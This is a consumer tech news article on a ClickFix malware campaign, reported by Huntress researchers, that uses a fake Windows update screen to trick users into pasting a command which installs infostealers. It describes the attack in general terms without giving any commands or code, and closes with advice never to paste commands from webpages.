A sneaky new strain of the ClickFix malware is making the rounds, and it’s going after the easiest victim of all: anyone who trusts a Windows update prompt. Security researchers at Huntress say the attackers have managed to put together a full-screen fake update screen that looks just convincing enough to trick people into giving it full access — all through a simple copy-paste trick.
The scam tends to show up on shady websites, mostly adult streaming pages filled with sketchy pop-ups. One misplaced click on an ad or a fake age check, and your entire browser suddenly turns into what looks like a legitimate Windows update stuck at 95%. It then claims you need to press Windows + R and paste a special command to finish the update. Of course, that’s exactly what the malware wants.
That command silently launches mshta, a built-in Windows tool, and pulls down a payload from a remote server. To make detection harder, the code includes tons of junk commands meant to throw off security software. In one of the odder twists, part of the malicious code is actually tucked inside a PNG image — the malware pulls hidden shellcode straight from the pixels and then injects itself into other running processes using .NET.
Once it’s embedded inside the system, the second stage kicks in. Known infostealers like Rhadamanthys or LummaC2 get dropped onto the machine, and from there it’s open season on passwords, browser cookies, banking logins, and crypto wallet data. Everything gets scooped up and shipped off to attackers.
Researchers say the campaign has been active since at least early October and is still very much ongoing, with multiple look-alike domains hosting the fake update screen. Forensic analysts also found random, useless strings in the code — including a weird reference to an old UN speech — apparently just thrown in to waste analysts’ time.
The worst part is that this attack relies entirely on social engineering. No file downloads. No obvious malware pop-ups. Just a website tricking you into running its command for it.
The quick takeaway:
Never copy and paste commands from a random webpage, no matter how official it looks. Real Windows updates don’t ask you to open the Run box — ever.
Don’t miss a thing! Join our Telegram community for instant updates and grab our free daily newsletter for the best tech stories!
For more daily updates, please visit our News Section.
Comments